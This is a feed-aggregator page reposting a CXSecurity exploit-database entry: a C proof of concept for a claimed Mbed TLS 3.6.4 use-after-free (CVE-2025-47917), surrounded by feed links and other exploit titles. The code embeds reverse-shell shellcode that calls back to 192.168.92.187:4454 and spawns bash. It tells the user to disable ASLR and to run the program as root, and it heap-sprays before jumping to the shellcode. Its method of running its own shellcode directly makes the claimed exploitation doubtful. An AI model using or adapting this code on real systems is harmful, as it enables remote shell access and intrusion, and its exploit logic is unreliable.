惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
T
Troy Hunt's Blog
P
Proofpoint News Feed
V
Vulnerabilities – Threatpost
C
Cybersecurity and Infrastructure Security Agency CISA
K
Kaspersky official blog
Cyberwarzone
Cyberwarzone
T
Tor Project blog
Cisco Talos Blog
Cisco Talos Blog
S
Securelist
L
Lohrmann on Cybersecurity
Security Latest
Security Latest
T
Threatpost
H
Heimdal Security Blog
W
WeLiveSecurity
A
Arctic Wolf
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
G
GRAHAM CLULEY
IT之家
IT之家
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
TaoSecurity Blog
TaoSecurity Blog
A
About on SuperTechFans
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
N
News and Events Feed by Topic
Hacker News - Newest:
Hacker News - Newest: "LLM"
Last Week in AI
Last Week in AI
T
The Blog of Author Tim Ferriss
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
Microsoft Azure Blog
Microsoft Azure Blog
Hugging Face - Blog
Hugging Face - Blog
Google DeepMind News
Google DeepMind News
量子位
Stack Overflow Blog
Stack Overflow Blog
Know Your Adversary
Know Your Adversary
B
Blog RSS Feed
阮一峰的网络日志
阮一峰的网络日志
WordPress大学
WordPress大学
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
AI
AI
OSCHINA 社区最新新闻
OSCHINA 社区最新新闻
博客园 - 司徒正美
Apple Machine Learning Research
Apple Machine Learning Research
GbyAI
GbyAI
Vercel News
Vercel News
C
Cyber Attacks, Cyber Crime and Cyber Security
Latest news
Latest news
D
Darknet – Hacking Tools, Hacker News & Cyber Security
大猫的无限游戏
大猫的无限游戏
Forbes - Security
Forbes - Security

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning VBA Bypass Windows Defender Exploit PoC Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com
2025-12-09 · via The Exploit Database - CXSecurity.com

Mbed TLS 3.6.4 Use-After-Free

/* * Exploit Title: Mbed TLS 3.6.4 - Use-After-Free * Google Dork: N/A * Date: 2025-08-29 * Exploit Author: Byte Reaper * Vendor Homepage: https://github.com/Mbed-TLS/mbedtls * Software Link: https://github.com/Mbed-TLS/mbedtls * Version: ≤ 3.6.4 * Tested on: Kali Linux * CVE: CVE-2025-47917 */ #include<stdio.h> #include<string.h> #include <sys/mman.h> #include <stdlib.h> #include <unistd.h> #include <stdint.h> #include "mbedtls/asn1.h" #include <mbedtls/x509.h> #include <mbedtls/x509_crt.h> #include <mbedtls/oid.h> #include <malloc.h> #define _GNU_SOURCE typedef struct { unsigned char *pointer; size_t pointerLen; }shell; typedef struct fake_named_data { struct fake_named_data *next; mbedtls_asn1_buf oid; mbedtls_asn1_buf val; } fake_named_data; void eS() { __asm__ volatile ( "xor %%rdi, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" : : :"rax", "rdi" ); } void checkAslr() { FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r"); if (!f) { perror("\e[1;31m[-] Error Open File !"); eS(); } int val; if (fscanf(f, "%d", &val) != 1) { printf("\e[1;31m[-] Failed to read ASLR status.\e[0m\n"); fclose(f); eS(); } fclose(f); if (val != 0) { printf("\e[1;31m[-] ASLR is enabled (value=%d). This may prevent reliable exploitation.\e[0m\n", val); printf("[\e[1;31m-] Please disable ASLR temporarily using: echo 0 | sudo tee /proc/sys/kernel/randomize_va_space\n"); printf("\e[1;31m[-] Exiting to avoid crash.\e[0m\n"); eS(); } printf("\e[1;36m[+] ASLR is disabled (value=0). Environment looks good.\e[0m\n"); } shell inject() { // ip : 192.168.92.187 // port : 4454 unsigned char shellcode[] = { 0x48, 0x31, 0xd2, 0xb8, 0x29, 0x00, 0x00, 0x00, 0xbe, 0x01, 0x00, 0x00, 0x00, 0xbf, 0x02, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x89, 0xc7, 0x49, 0x89, 0xc4, 0x48, 0x83, 0xec, 0x10, 0xc7, 0x44, 0x24, 0x0c, 0xbd, 0x5c, 0xa8, 0xc0, 0x66, 0xc7, 0x44, 0x24, 0x0a, 0x11, 0xc1, 0x66, 0xc7, 0x44, 0x24, 0x08, 0x02, 0x00, 0x48, 0x89, 0xe6, 0xba, 0x10, 0x00, 0x00, 0x00, 0xb8, 0x2a, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x4c, 0x89, 0xe7, 0xbe, 0x02, 0x00, 0x00, 0x00, 0xb8, 0x21, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xff, 0xce, 0x79, 0xf4, 0x48, 0x31, 0xd2, 0x48, 0xb8, 0x62, 0x2f, 0x73, 0x62, 0x61, 0x73, 0x68, 0x00, 0x50, 0x48, 0xb8, 0x2f, 0x75, 0x73, 0x72, 0x2f, 0x62, 0x69, 0x6e, 0x50, 0x48, 0x89, 0xe7, 0x52, 0x57, 0x48, 0x89, 0xe6, 0xb8, 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05 }; size_t shellcodeLen = sizeof(shellcode); shell a = { shellcode, shellcodeLen }; void *page = mmap(NULL, a.pointerLen, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANON|MAP_PRIVATE, -1, 0); memcpy(page, a.pointer, a.pointerLen); a.pointer = page; return a; } void paddingChunk(void *fakeP, size_t len) { for (int i = 0; i < 10000; i++) { void *p = malloc(len); size_t usable = malloc_usable_size(p); memcpy(p, fakeP, len); memset((char*)p + len, 0, usable - len); } } void pointerHead(mbedtls_asn1_named_data *head) { if (head->val.p == NULL) { printf("\e[1;91m[-] Pointer ShellCode Is NULl !!\e[0m\n"); eS(); } printf("\e[1;36m[*] Jumping to shellcode at %p\e[0m\n", head->val.p); void (*u)() = (void(*)()) head->val.p; u(); } void tls() { mbedtls_asn1_named_data *head = NULL; printf("\e[1;34m[+] Create Head Successfully !\e[0m\n"); printf("\e[1;35m[*] head before first call: %p\e[0m\n", head); int value = mbedtls_x509_string_to_names(&head, "CN=AAAA"); shell a = inject(); void *exec_mem = a.pointer; fake_named_data data = { .next = NULL, .oid = { .p = (unsigned char*) MBEDTLS_OID_AT_CN, .len = sizeof(MBEDTLS_OID_AT_CN) - 1 }, .val = { .p = a.pointer, .len = a.pointerLen } }; printf("\e[1;35m[*] head after first call: %p (value=%d)\e[0m\n", head, value); paddingChunk(&data, sizeof(mbedtls_asn1_named_data)); printf("\e[1;34m[+] Use heap spray...\e[0m\n"); usleep(500000); if (value == MBEDTLS_ERR_X509_INVALID_NAME) { printf("\e[1;31m[-] Invaild Name (Med Tls Name)!\e[0m\n"); printf("[\e[1;31m-] Value => (MBEDTLS_ERR_X509_INVALID_NAME)\e[0m\n"); printf("\e[1;31m[-] Exit (sys_exit)...\e[0m\n"); eS(); } printf("\e[1;35m[*] head before second call: %p\e[0m\n", head); int value2 = mbedtls_x509_string_to_names(&head, "CN=AAAA,CN=BBBB"); printf("\e[1;35m[*] head after second call: %p (value=%d)\e[0m\n", head, value2); printf("\e[1;34m[+] Successfully Create String Name.\e[0m\n"); pointerHead(head); printf("\e[1;34m[+] Jump Shellcode Pointer ...\e[0m\n"); printf("\e[1;34m[+] Pointer Shellcode : %p\e[0m\n", a.pointer); printf("\e[1;34m[+] Shellcode Injection Successfully !\e[0m\n"); printf("\e[1;34m[+] Shellcode Len : %zu\e[0m\n", a.pointerLen); printf("\e[1;33m[+] Please Check Reverse shell (nc -lvnp 4454)\e[0m\n"); printf("\e[1;34m[+] Success Free Head !\e[0m\n"); } int main() { printf("\e[0;95m+-------------------------------------------------+\e[0m\n"); printf("\e[0;95m|\e[0m \e[1;37mByte Reaper\e[0m \e[0;95m|\e[0m\n"); printf("\e[0;95m|\e[0m \e[1;33mExploit: CVE-2025-47917\e[0m \e[0;95m|\e[0m\n"); printf("\e[0;95m|\e[0m \e[1;31mVulnerability: UAF\e[0m \e[0;95m|\e[0m\n"); printf("\e[0;95m+-------------------------------------------------+\e[0m\n"); if (getuid() != 0) { printf("\e[1;31m[-] Please Run exploit in Root (sudo ./exploit)\n"); eS(); } checkAslr(); tls(); return 0; }



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}